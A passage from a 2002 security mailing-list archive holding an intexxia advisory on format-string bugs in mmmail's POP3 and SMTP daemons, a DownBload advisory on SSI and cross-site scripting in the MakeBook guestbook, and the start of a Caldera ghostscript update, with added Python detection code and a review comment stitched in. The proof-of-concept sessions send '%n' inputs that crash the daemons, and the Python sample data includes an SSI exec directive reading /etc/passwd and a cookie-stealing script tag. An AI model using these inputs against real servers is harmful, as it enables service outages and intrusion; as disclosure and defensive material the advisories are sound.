+OK pop3.somehost.net (mmpop3d (mmmail-0.0.13/mmondor)) Service ready
USER %p%p
- -ERR Invalid username

In the log file :
mmpop3d[2165]: 3CFC8B53 USER 0x8052f620x80a44fc

test:~$ telnet test.lab.intexxia.com 110
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
+OK pop3.somehost.net (mmpop3d (mmmail-0.0.13/mmondor)) Service ready
USER %s%s%n
Connection closed by foreign host.

test:~$ telnet test.lab.intexxia.com 110
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused


mmsmtpd
- ---
test:~$ telnet test.lab.intexxia.com 25
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 smtp.somehost.net (mmsmtpd (mmmail-0.0.13/mmondor)) Service ready
HELO %p%p
501 Invalid hostname

In the log file :
mmsmtpd[2188]: 3CFC8BF9 HELO 0x8052e360x80a447c

test:~$ telnet test.lab.intexxia.com 25
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 smtp.somehost.net (mmsmtpd (mmmail-0.0.13/mmondor)) Service ready
HELO %s%s%n
Connection closed by foreign host.

test:~$ telnet test.lab.intexxia.com 25
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused





SOLUTION
===

The following patch corrects this issue :

iff -dru mmmail-0.0.13/mmlib/mmlog.c mmmail-0.0.13.fixed/mmlib/mmlog.c
- --- mmmail-0.0.13/mmlib/mmlog.c Mon May 13 08:20:13 2002
+++ mmmail-0.0.13.fixed/mmlib/mmlog.c Tue Jun  4 12:37:19 2002
@@ -70,7 +70,7 @@
  va_start(lst, fmt);
  vsnprintf(buf, 1023, fmt, lst);
  va_end(lst);
- - syslog(LOG_NOTICE, buf);
+ syslog(LOG_NOTICE, "%s", buf);
 }
 }
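Review bot: this is byte-for-byte the same `mmlib/mmlog.c` hunk as in the mmftpd advisory, with the same original timestamp (Mon May 13 08:20:13 2002), so mmlib is evidently copied into each of these daemons; a shared mmlib release, or at least a cross-reference in both changelogs, would stop a bug fixed in one copy from surviving in the other. As with mmftpd, `vsnprintf(buf, 1023, fmt, lst);` still formats a caller-chosen `fmt`, so the HELO and USER arguments must never be passed as the format by any caller in mmsmtpd or mmpop3d, and 1023 should be derived from the buffer's declared size rather than repeated as a literal.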

A new version including this patch is available at the following URL :
http://mmondor.gobot.ca/software/linux/mmmail-0.0.14.tar.gz





VENDOR STATUS
=

04-06-2002 : This bulletin was sent to Matthew Mondor.
05-06-2002 : Matthew   was  very   reactive  and  confirmed  the
 vulnerability. He released a new version.





LEGALS
==

mmmail is a registered trademark.


Intexxia provides this  information  as a public service and "as
is". Intexxia  will not be  held accountable for  any damage or distress
caused by the proper or improper usage of these materials.


(c) intexxia 2002. This  document is property  of intexxia. Feel
free to use and distribute  this material as long as  credit is given to
intexxia and the author.





CONTACT
===

CERT intexxia  [EMAIL PROTECTED]
INTEXXIA http://www.intexxia.com
171, av. Georges Clemenceau          Standard : +33 1 55 69 49 10
92024 Nanterre Cedex - France
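Both intexxia advisories show the same pattern: a command argument (USER for mmftpd and mmpop3d, HELO for mmsmtpd) becomes the syslog(3) format string, "%p" leaks pointers into the log and "%n" crashes the daemon. As an added example covering both (not intexxia's or Matthew Mondor's code), detection logic in Python that a front-end filter or a log review can run: it classifies client command lines by the printf conversions they carry, marks "%n" as the write primitive, and pulls the run-together "%p" output back out of the log lines the advisories quote. The command set, the function names and the sample session are assumptions taken from the proofs of concept above.

```python
"""Constructed example: spot printf directives in FTP/SMTP/POP3 command
arguments (what both proofs of concept send) and leaked pointers in the
resulting log lines. Not intexxia's or mmondor's code; names assumed."""

import re

# One printf conversion: flags, width, precision, length modifier, conversion.
_DIRECTIVE = re.compile(
    r"%[-+ #0]*(?:\d+|\*)?(?:\.(?:\d+|\*))?(?:hh|h|ll|l|L|q|j|z|t)?"
    r"([diouxXeEfFgGaAcspn%])")

# Commands whose argument reaches mmsyslog() according to the two advisories
# (USER in mmftpd/mmpop3d, HELO in mmsmtpd); extend per daemon.
LOGGED_COMMANDS = {"USER", "HELO"}

# "%p" output run together without separators, as in the advisory's
# "Failed login for 0x80598800x80ae73c": lazy match up to the next "0x".
_POINTER = re.compile(r"0x[0-9a-fA-F]{6,8}?(?=0x|[^0-9a-fA-Fx]|$)")


def classify_command(line: str):
    """Return None for a harmless command line, else a summary of what it carries."""
    m = re.match(r"\s*([A-Za-z]+)(?:\s+(.*))?$", line.rstrip("\r\n"))
    if not m:
        return None
    verb, arg = m.group(1).upper(), m.group(2) or ""
    conversions = [c for c in _DIRECTIVE.findall(arg) if c != "%"]  # "%%" is literal
    if not conversions:
        return None
    return {
        "command": verb,
        "logged": verb in LOGGED_COMMANDS,         # argument known to hit syslog()
        "conversions": conversions,
        "writes_memory": "n" in conversions,       # %n: the write primitive
        "reads_stack": any(c in "psxXdiu" for c in conversions),
    }


def scan_session(lines: list) -> list:
    """Run classify_command over client lines; return the suspicious ones in order."""
    return [info for info in map(classify_command, lines) if info]


def leaked_pointers(log_line: str) -> list:
    """Recover %p output from a syslog line, even when the values are run together."""
    return _POINTER.findall(log_line)


# Constructed client lines, taken from the advisories' proofs of concept
# plus two benign ones.
POC_SESSION = ["USER %p%p", "PASS foo", "USER %p%p%n", "HELO %s%s%n",
               "USER alice", "HELO 100%% done"]
```

A "%p%p" probe with no "%n" is the reconnaissance step (pointers in the log, daemon still up); the "%n" line is the one that takes the service down, as the "Connection refused" in the proofs of concept shows, so a filter should reject the first as well rather than wait for the second. The pointer regex is only a log-review aid: once the service is patched the log field holds the literal "%p%p" instead.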

SSI & CSS execution in MakeBook 2.2

2002-06-12 Thread DownBload



  [ DownBload Security Research Lab Advisory ]
[-]
Advisory name: SSI & CSS execution in MakeBook 2.2
Advisory number: 5  
Application: MakeBook 2.2 (CGI script)
Application author: Kristina Pfaff-Harris 
Source: http://www.tesol.net/scriptmail.html
Date: 12.6.2002 
Impact: remote user can execute shell commands & cross site scripting 
Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4
Discovered by: DownBload
Mail me @: [EMAIL PROTECTED]




--[ Overview 

"...MakeBook v2.2 is a simple program which can be used as a guestbook,
an ongoing writing project where each person adds to an ongoing story,
a comment board, or even a way to let people add comments to many
individual pages.  It allows a user to enter their name, email address,
and some text which will then be added to the "bookfile".  Originally
intended for use in writing a continuing story or journal, where
different students could add to the story as they went along, it has
evolved into a more flexible system which allows the owner to choose
how the "book" entries should appear, and even what pages they appear 
on..."


   

--[ Problem 

Our dear Kristina wrote an advanced CGI guestbook, in Perl of course.
It works fine, but trouble comes when you look at the security measures in
the program. When you want to sign the guestbook, you have to enter your name,
email address and some text. The script does remove 'some' special characters
in $text, but it doesn't replace special characters in $name at all, and
because of that it is possible to enter, instead of a name, SSI (Server
Side Includes) or CSS (Cross Site Scripting, i.e. XSS) code that will then be
executed.
'Buggy' code:
...
$name =$data{"Name"};
$email =$data{"Email"};
$text =$data{"Text"};
$text =~ s//>/g;
...




--[ Examples

SSI attack
~~
Name: 
E-mail: [EMAIL PROTECTED]
Text: I hacked you, my kung-fu is the best... ;)

CSS attack
~~
Name: 
E-mail: [EMAIL PROTECTED]
Text: I hacked you, my kung-fu is the best... ;)

I won't give you more examples, use your own imagination :).
BTW: SSI attack depends on web server, because some web servers
comes with, and some without support for SSI.




--[ Solution 

Solution for this bug would be to filter special characters from user
input. For now, you can use this:

...
$name  = $data{"Name"};
$name  =~ s//>/g;

$email = $data{"Email"};
$email =~ s//>/g;

$text = $data{"Text"};
$text =~ s//>/g;
...




--[ Greetz

Greetz goes to #hr.hackers .
Special greetz goes to Kristina Pfaff-Harris (ladies first), BoyScout, 
h4z4rd, fi, Fr1c, harlequin and www.active-security.org.
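As an added example (not DownBload's code and not MakeBook's Perl), the field handling from the advisory in Python, the script's original text-only escaping beside the proposed fix of escaping every field, run over constructed submissions modelled on the two attacks described above. The SSI directive and script tag used as Name, the bookfile layout and the function names are assumptions for the example; the real MakeBook template is not on the page.

```python
"""Constructed example: MakeBook's field handling, vulnerable form beside the
hardened one, with the post's two payload types as constructed input.
Not the advisory's or MakeBook's code; layout and names are assumed."""

import html
import re

# An SSI directive or the start of an HTML tag surviving in user data.
_ACTIVE = re.compile(r"<!--#|</?[a-zA-Z]")


def escape_field(value: str) -> str:
    """HTML-escape &, <, >, double and single quotes so the value is inert as page text."""
    return html.escape(value, quote=True)


def sanitize_text_only(fields: dict) -> dict:
    """The script's original behaviour: only Text is escaped; Name and Email pass through."""
    out = dict(fields)
    out["Text"] = escape_field(fields["Text"])
    return out


def sanitize_all(fields: dict) -> dict:
    """The fix: every user-supplied field is escaped before it reaches the bookfile."""
    return {k: escape_field(v) for k, v in fields.items()}


def has_active_markup(value: str) -> bool:
    """True if a value still carries an SSI directive or an HTML tag."""
    return _ACTIVE.search(value) is not None


def render_entry(fields: dict) -> str:
    """Assumed bookfile fragment; MakeBook's real template is not on the page."""
    return "<p><b>{Name}</b> ({Email}) wrote:<br>\n{Text}</p>\n".format(**fields)


# Constructed submissions modelled on the two attacks described in the post.
SSI_POST = {"Name": '<!--#exec cmd="cat /etc/passwd" -->',
            "Email": "someone@example.com",
            "Text": "I hacked you, my kung-fu is the best... ;)"}
XSS_POST = {"Name": "<script>alert(document.cookie)</script>",
            "Email": "someone@example.com",
            "Text": "I hacked you, my kung-fu is the best... ;)"}
```

With sanitize_text_only() the rendered entry still contains "<!--#exec", which a server with SSI enabled for that file will execute when the page is served; with sanitize_all() it becomes "&lt;!--#exec", plain text in both the SSI and the browser case. Escaping is the minimum; a guestbook should also never be written under a name the server treats as SSI-parsed.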




Security Update: [CSSA-2002-026.0] Linux: ghostscript arbitrary command execution

2002-06-12 Thread security

To: [EMAIL PROTECTED] [EMAIL PROTECTED] 
[EMAIL PROTECTED]


__

Caldera International, Inc.  Security Advisory

Subject:Linux: ghostscript arbitrary command execution
Advisory number:CSSA-2002-026.0
Issue date: 2002 June 11
Cross reference:
__


1. Problem Description

An untrusted PostScript file that uses .locksafe or .setsafe to
reset the current page device can force the ghostscript program
to execute arbitrary commands.


2. Vulnerable Supported Versions

System                       Package
---------------------------  ------------------------------------------------

OpenLinux 3.1.1 Server       prior to ghostscript-6.51-10.i386.rpm
                             prior to ghostscript-doc-6.51-10.i386.rpm
                             prior to ghostscript-fonts-6.51-10.i386.rpm
                             prior to ghostscript-fonts-cid-6.51-10.i386.rpm

OpenLinux 3.1.1 Workstation  prior to ghostscript-6.51-10.i386.rpm
                             prior to ghostscript-doc-6.51-10.i386.rpm
                             prior to ghostscript-fonts-6.51-10.i386.rpm
                             prior to ghostscript-fonts-cid-6.51-10.i386.rpm

OpenLinux 3.1 Server         prior to ghostscript-6.51-10.i386.rpm
                             prior to ghostscript-doc-6.51-10.i386.rpm
                             prior to ghostscript-fonts-6.51-10.i386.rpm
                             prior to ghostscript-fonts-cid-6.51-10.i386.rpm

OpenLinux 3.1 Workstation    prior to ghostscript-6.51-10.i386.rpm
                             prior to ghostscript-doc-6.51-10.i386.rpm
                             prior to ghostscript-fonts-6.51-10.i386.rpm
                             prior to ghostscript-fonts-cid-6.51-10.i386.rpm


3. Solution

The proper solution is to install the latest packages.


4. OpenLinux 3.1.1 Server

4.1 Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Server/current/RPMS

4.2 Packages

cfabdbccacd4de0268ce15d1dd6a0408  ghostscript-6.51-10.i386.rpm
f9bb38edc64d718f8b943d395de7c75a  ghostscript-doc-6.51-10.i386.rpm
70a913d9427ce45367710498bab8e065  ghostscript-fonts-6.51-10.i386.rpm
9e2f736b44b9bfa60e51c24847637d48  ghostscript-fonts-cid-6.51-10.i386.rpm

4.3 Installation

rpm -Fvh ghostscript-6.51-10.i386.rpm
rpm -Fvh ghostscript-doc-6.51-10.i386.rpm
rpm -Fvh ghostscript-fonts-6.51-10.i386.rpm
rpm -Fvh ghostscript-fonts-cid-6.51-10.i386.rpm

4.4 Source Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Server/current/SRPMS

4.5 Source Packages

dba70bda415835cca29139d565936b3f  ghostscript-6.51-10.src.rpm


5. OpenLinux 3.1.1 Workstation

5.1 Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Workstation/current/RPMS

5.2 Packages

f8a0bf41a7dd801f6f98d50134143fbd  ghostscript-6.51-10.i386.rpm
a2d8fbd76bc080146b1a1a964a218850  ghostscript-doc-6.51-10.i386.rpm
bccaab1b0a9005ea7d36173e296b444e  ghostscript-fonts-6.51-10.i386.rpm
dadf94bb7c6091cfb32d650a61e8864d  ghostscript-fonts-cid-6.51-10.i386.rpm

5.3 Installation

rpm -Fvh ghostscript-6.51-10.i386.rpm
rpm -Fvh ghostscript-doc-6.51-10.i386.rpm
rpm -Fvh ghostscript-fonts-6.51-10.i386.rpm
rpm -Fvh ghostscript-fonts-cid-6.51-10.i386.rpm

5.4 Source Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Workstation/current/SRPMS

5.5 Source Packages

38ebafe42e38f5eae8207c4f52bbb90d  ghostscript-6.51-10.src.rpm


6. OpenLinux 3.1 Server

6.1 Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/RPMS

6.2 Packages

12aa5320c2331010736ce36a9fc1ef3d  ghostscript-6.51-10.i386.rpm
1a40569d1a9598df507faae191e68c48  ghostscript-doc-6.51-10.i386.rpm
f44b0f45f4864d2b357b02642c4cd249  ghostscript-fonts-6.51-10.i386.rpm
e28affd61ec6bdc19e136c1355307e90  ghostscript-fonts-cid-6.51-10.i386.rpm

6.3 Installation

rpm -Fvh ghostscript-6.51-10.i386.rpm
rpm -Fvh ghostscript-doc-6.51-10.i386.rpm
rpm -Fvh ghostscript-fonts-6.51-10.i386.rpm
rpm -Fvh ghostscript-fonts-cid-6.51-10.i386.rpm

6.4 Source Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/SRPMS

6.5 Source Packages